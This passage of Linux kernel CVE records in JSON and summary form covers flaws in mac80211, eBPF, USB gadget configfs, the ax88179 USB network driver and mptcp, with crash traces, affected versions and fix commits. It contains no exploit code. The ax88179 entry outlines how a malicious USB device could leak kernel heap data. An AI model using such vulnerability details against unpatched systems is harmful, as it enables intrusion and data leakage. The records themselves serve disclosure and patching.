"status": "unaffected",
"version": "5.15.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.165",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.90",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mac80211: sdata can be NULL during AMPDU start\n\nieee80211_tx_ba_session_handle_start() may get NULL for sdata when a\ndeauthentication is ongoing.\n\nHere a trace triggering the race with the hostapd test\nmulti_ap_fronthaul_on_ap:\n\n(gdb) list *drv_ampdu_action+0x46\n0x8b16 is in drv_ampdu_action (net/mac80211/driver-ops.c:396).\n391 int ret = -EOPNOTSUPP;\n392\n393 might_sleep();\n394\n395 sdata = get_bss_sdata(sdata);\n396 if (!check_sdata_in_driver(sdata))\n397 return -EIO;\n398\n399 trace_drv_ampdu_action(local, sdata, params);\n400\n\nwlan0: moving STA 02:00:00:00:03:00 to state 3\nwlan0: associated\nwlan0: deauthenticating from 02:00:00:00:03:00 by local choice (Reason: 3=DEAUTH_LEAVING)\nwlan3.sta1: Open BA session requested for 02:00:00:00:00:00 tid 0\nwlan3.sta1: dropped frame to 02:00:00:00:00:00 (unauthorized port)\nwlan0: moving STA 02:00:00:00:03:00 to state 2\nwlan0: moving STA 02:00:00:00:03:00 to state 1\nwlan0: Removed STA 02:00:00:00:03:00\nwlan0: Destroyed STA 02:00:00:00:03:00\nBUG: unable to handle page fault for address: fffffffffffffb48\nPGD 11814067 P4D 11814067 PUD 11816067 PMD 0\nOops: 0000 [#1] PREEMPT SMP PTI\nCPU: 2 PID: 133397 Comm: kworker/u16:1 Tainted: G W 6.1.0-rc8-wt+ #59\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.0-20220807_005459-localhost 04/01/2014\nWorkqueue: phy3 ieee80211_ba_session_work [mac80211]\nRIP: 0010:drv_ampdu_action+0x46/0x280 [mac80211]\nCode: 53 48 89 f3 be 89 01 00 00 e8 d6 43 bf ef e8 21 46 81 f0 83 bb a0 1b 00 00 04 75 0e 48 8b 9b 28 0d 00 00 48 81 eb 10 0e 00 00 \u003c8b\u003e 93 58 09 00 00 f6 c2 20 0f 84 3b 01 00 00 8b 05 dd 1c 0f 00 85\nRSP: 0018:ffffc900025ebd20 EFLAGS: 00010287\nRAX: 0000000000000000 RBX: fffffffffffff1f0 RCX: ffff888102228240\nRDX: 0000000080000000 RSI: ffffffff918c5de0 RDI: ffff888102228b40\nRBP: ffffc900025ebd40 R08: 0000000000000001 R09: 0000000000000001\nR10: 0000000000000001 R11: 0000000000000000 R12: ffff888118c18ec0\nR13: 0000000000000000 R14: ffffc900025ebd60 R15: ffff888018b7efb8\nFS: 0000000000000000(0000) GS:ffff88817a600000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: fffffffffffffb48 CR3: 0000000105228006 CR4: 0000000000170ee0\nCall Trace:\n \u003cTASK\u003e\n ieee80211_tx_ba_session_handle_start+0xd0/0x190 [mac80211]\n ieee80211_ba_session_work+0xff/0x2e0 [mac80211]\n process_one_work+0x29f/0x620\n worker_thread+0x4d/0x3d0\n ? process_one_work+0x620/0x620\n kthread+0xfb/0x120\n ? kthread_complete_and_exit+0x20/0x20\n ret_from_fork+0x22/0x30\n \u003c/TASK\u003e"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:16.939Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/187523fa7c2d4c780f775cb869216865c4a909ef"
},
{
"url": "https://git.kernel.org/stable/c/a12fd43bd175fa52c82f9740179d38c34ca1b62e"
},
{
"url": "https://git.kernel.org/stable/c/c838df8461a601b20dc1b9fb1834d2aad8e2f949"
},
{
"url": "https://git.kernel.org/stable/c/69403bad97aa0162e3d7911b27e25abe774093df"
}
],
"title": "wifi: mac80211: sdata can be NULL during AMPDU start",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48875",
"datePublished": "2024-08-21T06:10:06.207Z",
"dateReserved": "2024-07-16T11:38:08.922Z",
"dateUpdated": "2025-05-04T08:25:16.939Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-4204 (GCVE-0-2021-4204)
Vulnerability from cvelistv5
Published
2022-08-24 00:00
Modified
2024-08-03 17:16
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-20 - - Improper Input Validation
Summary
An out-of-bounds (OOB) memory access flaw was found in the Linux kernel's eBPF due to an Improper Input Validation. This flaw allows a local attacker with a special privilege to crash the system or leak internal information.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T17:16:04.362Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2039178"
},
{
"tags": [
"x_transferred"
],
"url": "https://access.redhat.com/security/cve/CVE-2021-4204"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.openwall.com/lists/oss-security/2022/01/11/4"
},
{
"tags": [
"x_transferred"
],
"url": "https://security-tracker.debian.org/tracker/CVE-2021-4204"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20221228-0003/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "kernel",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "Affects Linux kernel v5.8 or later"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An out-of-bounds (OOB) memory access flaw was found in the Linux kernel\u0027s eBPF due to an Improper Input Validation. This flaw allows a local attacker with a special privilege to crash the system or leak internal information."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-20",
"description": "CWE-20 - Improper Input Validation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-12-28T00:00:00",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2039178"
},
{
"url": "https://access.redhat.com/security/cve/CVE-2021-4204"
},
{
"url": "https://www.openwall.com/lists/oss-security/2022/01/11/4"
},
{
"url": "https://security-tracker.debian.org/tracker/CVE-2021-4204"
},
{
"url": "https://security.netapp.com/advisory/ntap-20221228-0003/"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2021-4204",
"datePublished": "2022-08-24T00:00:00",
"dateReserved": "2022-01-11T00:00:00",
"dateUpdated": "2024-08-03T17:16:04.362Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42236 (GCVE-0-2024-42236)
Vulnerability from cvelistv5
Published
2024-08-07 15:14
Modified
2025-05-04 09:24
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: configfs: Prevent OOB read/write in usb_string_copy()
Userspace provided string 's' could trivially have the length zero. Left
unchecked this will firstly result in an OOB read in the form
`if (str[0 - 1] == '\n') followed closely by an OOB write in the form
`str[0 - 1] = '\0'`.
There is already a validating check to catch strings that are too long.
Let's supply an additional check for invalid strings that are too short.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42236",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:14:04.317460Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:32.140Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/usb/gadget/configfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a444c3fc264119801575ab086e03fb4952f23fd0",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "c95fbdde87e39e5e0ae27f28bf6711edfb985caa",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e8474a10c535e6a2024c3b06e37e4a3a23beb490",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "72b8ee0d9826e8ed00e0bdfce3e46b98419b37ce",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "2d16f63d8030903e5031853e79d731ee5d474e70",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d1205033e912f9332c1dbefa812e6ceb0575ce0a",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "eecfefad0953b2f31aaefa058f7f348ff39c4bba",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6d3c721e686ea6c59e18289b400cc95c76e927e0",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/usb/gadget/configfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.318",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.280",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.222",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.163",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.100",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.41",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.318",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.280",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.222",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.163",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.100",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.41",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: gadget: configfs: Prevent OOB read/write in usb_string_copy()\n\nUserspace provided string \u0027s\u0027 could trivially have the length zero. Left\nunchecked this will firstly result in an OOB read in the form\n`if (str[0 - 1] == \u0027\\n\u0027) followed closely by an OOB write in the form\n`str[0 - 1] = \u0027\\0\u0027`.\n\nThere is already a validating check to catch strings that are too long.\nLet\u0027s supply an additional check for invalid strings that are too short."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:24:46.800Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a444c3fc264119801575ab086e03fb4952f23fd0"
},
{
"url": "https://git.kernel.org/stable/c/c95fbdde87e39e5e0ae27f28bf6711edfb985caa"
},
{
"url": "https://git.kernel.org/stable/c/e8474a10c535e6a2024c3b06e37e4a3a23beb490"
},
{
"url": "https://git.kernel.org/stable/c/72b8ee0d9826e8ed00e0bdfce3e46b98419b37ce"
},
{
"url": "https://git.kernel.org/stable/c/2d16f63d8030903e5031853e79d731ee5d474e70"
},
{
"url": "https://git.kernel.org/stable/c/d1205033e912f9332c1dbefa812e6ceb0575ce0a"
},
{
"url": "https://git.kernel.org/stable/c/eecfefad0953b2f31aaefa058f7f348ff39c4bba"
},
{
"url": "https://git.kernel.org/stable/c/6d3c721e686ea6c59e18289b400cc95c76e927e0"
}
],
"title": "usb: gadget: configfs: Prevent OOB read/write in usb_string_copy()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42236",
"datePublished": "2024-08-07T15:14:25.642Z",
"dateReserved": "2024-07-30T07:40:12.252Z",
"dateUpdated": "2025-05-04T09:24:46.800Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48805 (GCVE-0-2022-48805)
Vulnerability from cvelistv5
Published
2024-07-16 11:43
Modified
2025-05-04 08:23
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: usb: ax88179_178a: Fix out-of-bounds accesses in RX fixup
ax88179_rx_fixup() contains several out-of-bounds accesses that can be
triggered by a malicious (or defective) USB device, in particular:
- The metadata array (hdr_off..hdr_off+2*pkt_cnt) can be out of bounds,
causing OOB reads and (on big-endian systems) OOB endianness flips.
- A packet can overlap the metadata array, causing a later OOB
endianness flip to corrupt data used by a cloned SKB that has already
been handed off into the network stack.
- A packet SKB can be constructed whose tail is far beyond its end,
causing out-of-bounds heap data to be considered part of the SKB's
data.
I have tested that this can be used by a malicious USB device to send a
bogus ICMPv6 Echo Request and receive an ICMPv6 Echo Reply in response
that contains random kernel heap data.
It's probably also possible to get OOB writes from this on a
little-endian system somehow - maybe by triggering skb_cow() via IP
options processing -, but I haven't tested that.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: e2ca90c276e1fc410d7cd3c1a4eee245ec902a20 Version: e2ca90c276e1fc410d7cd3c1a4eee245ec902a20 Version: e2ca90c276e1fc410d7cd3c1a4eee245ec902a20 Version: e2ca90c276e1fc410d7cd3c1a4eee245ec902a20 Version: e2ca90c276e1fc410d7cd3c1a4eee245ec902a20 Version: e2ca90c276e1fc410d7cd3c1a4eee245ec902a20 Version: e2ca90c276e1fc410d7cd3c1a4eee245ec902a20 Version: e2ca90c276e1fc410d7cd3c1a4eee245ec902a20 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T15:25:01.769Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/711b6bf3fb052f0a6b5b3205d50e30c0c2980382"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/63f0cfb36c1f1964a59ce544156677601e2d8740"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1668781ed24da43498799aa4f65714a7de201930"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a0fd5492ee769029a636f1fb521716b022b1423d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/758290defe93a865a2880d10c5d5abd288b64b5d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ffd0393adcdcefab7e131488e10dcfde5e02d6eb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9681823f96a811268265f35307072ad80713c274"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/57bc3d3ae8c14df3ceb4e17d26ddf9eeab304581"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48805",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:58:50.903350Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:13.907Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/usb/ax88179_178a.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "711b6bf3fb052f0a6b5b3205d50e30c0c2980382",
"status": "affected",
"version": "e2ca90c276e1fc410d7cd3c1a4eee245ec902a20",
"versionType": "git"
},
{
"lessThan": "63f0cfb36c1f1964a59ce544156677601e2d8740",
"status": "affected",
"version": "e2ca90c276e1fc410d7cd3c1a4eee245ec902a20",
"versionType": "git"
},
{
"lessThan": "1668781ed24da43498799aa4f65714a7de201930",
"status": "affected",
"version": "e2ca90c276e1fc410d7cd3c1a4eee245ec902a20",
"versionType": "git"
},
{
"lessThan": "a0fd5492ee769029a636f1fb521716b022b1423d",
"status": "affected",
"version": "e2ca90c276e1fc410d7cd3c1a4eee245ec902a20",
"versionType": "git"
},
{
"lessThan": "758290defe93a865a2880d10c5d5abd288b64b5d",
"status": "affected",
"version": "e2ca90c276e1fc410d7cd3c1a4eee245ec902a20",
"versionType": "git"
},
{
"lessThan": "ffd0393adcdcefab7e131488e10dcfde5e02d6eb",
"status": "affected",
"version": "e2ca90c276e1fc410d7cd3c1a4eee245ec902a20",
"versionType": "git"
},
{
"lessThan": "9681823f96a811268265f35307072ad80713c274",
"status": "affected",
"version": "e2ca90c276e1fc410d7cd3c1a4eee245ec902a20",
"versionType": "git"
},
{
"lessThan": "57bc3d3ae8c14df3ceb4e17d26ddf9eeab304581",
"status": "affected",
"version": "e2ca90c276e1fc410d7cd3c1a4eee245ec902a20",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/usb/ax88179_178a.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.9"
},
{
"lessThan": "3.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.9.*",
"status": "unaffected",
"version": "4.9.303",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.14.*",
"status": "unaffected",
"version": "4.14.268",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.231",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.180",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.101",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.9.303",
"versionStartIncluding": "3.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.14.268",
"versionStartIncluding": "3.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.231",
"versionStartIncluding": "3.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.180",
"versionStartIncluding": "3.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.101",
"versionStartIncluding": "3.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.24",
"versionStartIncluding": "3.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.10",
"versionStartIncluding": "3.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "3.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: ax88179_178a: Fix out-of-bounds accesses in RX fixup\n\nax88179_rx_fixup() contains several out-of-bounds accesses that can be\ntriggered by a malicious (or defective) USB device, in particular:\n\n - The metadata array (hdr_off..hdr_off+2*pkt_cnt) can be out of bounds,\n causing OOB reads and (on big-endian systems) OOB endianness flips.\n - A packet can overlap the metadata array, causing a later OOB\n endianness flip to corrupt data used by a cloned SKB that has already\n been handed off into the network stack.\n - A packet SKB can be constructed whose tail is far beyond its end,\n causing out-of-bounds heap data to be considered part of the SKB\u0027s\n data.\n\nI have tested that this can be used by a malicious USB device to send a\nbogus ICMPv6 Echo Request and receive an ICMPv6 Echo Reply in response\nthat contains random kernel heap data.\nIt\u0027s probably also possible to get OOB writes from this on a\nlittle-endian system somehow - maybe by triggering skb_cow() via IP\noptions processing -, but I haven\u0027t tested that."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:23:28.584Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/711b6bf3fb052f0a6b5b3205d50e30c0c2980382"
},
{
"url": "https://git.kernel.org/stable/c/63f0cfb36c1f1964a59ce544156677601e2d8740"
},
{
"url": "https://git.kernel.org/stable/c/1668781ed24da43498799aa4f65714a7de201930"
},
{
"url": "https://git.kernel.org/stable/c/a0fd5492ee769029a636f1fb521716b022b1423d"
},
{
"url": "https://git.kernel.org/stable/c/758290defe93a865a2880d10c5d5abd288b64b5d"
},
{
"url": "https://git.kernel.org/stable/c/ffd0393adcdcefab7e131488e10dcfde5e02d6eb"
},
{
"url": "https://git.kernel.org/stable/c/9681823f96a811268265f35307072ad80713c274"
},
{
"url": "https://git.kernel.org/stable/c/57bc3d3ae8c14df3ceb4e17d26ddf9eeab304581"
}
],
"title": "net: usb: ax88179_178a: Fix out-of-bounds accesses in RX fixup",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48805",
"datePublished": "2024-07-16T11:43:56.950Z",
"dateReserved": "2024-07-16T11:38:08.896Z",
"dateUpdated": "2025-05-04T08:23:28.584Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48906 (GCVE-0-2022-48906)
Vulnerability from cvelistv5
Published
2024-08-22 01:30
Modified
2025-05-04 12:43
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
mptcp: Correctly set DATA_FIN timeout when number of retransmits is large
Syzkaller with UBSAN uncovered a scenario where a large number of
DATA_FIN retransmits caused a shift-out-of-bounds in the DATA_FIN
timeout calculation:
================================================================================
UBSAN: shift-out-of-bounds in net/mptcp/protocol.c:470:29
shift exponent 32 is too large for 32-bit type 'unsigned int'
CPU: 1 PID: 13059 Comm: kworker/1:0 Not tainted 5.17.0-rc2-00630-g5fbf21c90c60 #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014
Workqueue: events mptcp_worker
Call Trace:
<TASK>
__dump_stack lib/dump_stack.c:88 [inline]
dump_stack_lvl+0xcd/0x134 lib/dump_stack.c:106
ubsan_epilogue+0xb/0x5a lib/ubsan.c:151
__ubsan_handle_shift_out_of_bounds.cold+0xb2/0x20e lib/ubsan.c:330
mptcp_set_datafin_timeout net/mptcp/protocol.c:470 [inline]
__mptcp_retrans.cold+0x72/0x77 net/mptcp/protocol.c:2445
mptcp_worker+0x58a/0xa70 net/mptcp/protocol.c:2528
process_one_work+0x9df/0x16d0 kernel/workqueue.c:2307
worker_thread+0x95/0xe10 kernel/workqueue.c:2454
kthread+0x2f4/0x3b0 kernel/kthread.c:377
ret_from_fork+0x1f/0x30 arch/x86/entry/entry_64.S:295
</TASK>
================================================================================
This change limits the maximum timeout by limiting the size of the
shift, which keeps all intermediate values in-bounds.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48906",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:34:17.194266Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:02.444Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/mptcp/protocol.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "0c3f34beb459753f9f80d0cc14c1b50ab615c631",
"status": "affected",
"version": "6477dd39e62c3a67cfa368ddc127410b4ae424c6",
"versionType": "git"
},
{
"lessThan": "03ae283bd71f761feae3f402668d698b393b0e79",
"status": "affected",
"version": "6477dd39e62c3a67cfa368ddc127410b4ae424c6",
"versionType": "git"
},
{
"lessThan": "877d11f0332cd2160e19e3313e262754c321fa36",
"status": "affected",
"version": "6477dd39e62c3a67cfa368ddc127410b4ae424c6",
"versionType": "git"
},
{
"status": "affected",
"version": "0af76111c2a6326e4bb56f64a6e453c6ec6dd2da",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/mptcp/protocol.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
